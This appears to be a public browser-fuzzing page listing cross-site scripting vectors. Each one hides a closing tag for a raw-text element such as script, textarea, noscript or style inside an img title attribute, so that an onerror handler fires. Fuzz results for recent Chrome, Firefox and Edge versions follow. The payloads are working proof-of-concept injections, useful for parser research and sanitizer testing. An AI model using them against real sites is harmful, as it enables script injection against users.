XSS vectors that consume tag
9
9
9This vector shows which events fire without user interaction
Created byY4tacker
Created Nov 5, 2024
Updated May 28, 2025
Detecting browser...
CategoryHTML Parsing
VisibilityPublic
TypeXSS
CharsetUTF-8
$[data1] placeholderhtml
Template used:
<$[data1]><img title="</$[data1]><img src=x onerror=log('$[data1]')>"></$[data1]>Sample payloads
<iframe><img title="</iframe><img src=x onerror=alert('iframe')>"></iframe><noembed><img title="</noembed><img src=x onerror=alert('noembed')>"></noembed><noframes><img title="</noframes><img src=x onerror=alert('noframes')>"></noframes><noscript><img title="</noscript><img src=x onerror=alert('noscript')>"></noscript><script><img title="</script><img src=x onerror=alert('script')>"></script><style><img title="</style><img src=x onerror=alert('style')>"></style><textarea><img title="</textarea><img src=x onerror=alert('textarea')>"></textarea><title><img title="</title><img src=x onerror=alert('title')>"></title><xmp><img title="</xmp><img src=x onerror=alert('xmp')>"></xmp>Fuzz results
Chrome 145.0.0.0 desktop Windows NT 10.0
Updated16 Feb 2026
Found 9 results
Loading...
Chrome 144.0.0.0 desktop macOS 10.15.7older version
Updated31 Jan 2026
Found 9 results
Loading...
Firefox 147.0 desktop macOS 10.15
Updated30 Jan 2026
Found 9 results
Loading...
Firefox 115.0 desktop Windows NT 6.1older version
Updated13 Sept 2025
Found 9 results
Loading...
Microsoft Edge 145.0.0.0 desktop Windows NT 10.0
Updated18 Feb 2026
Found 9 results
Loading...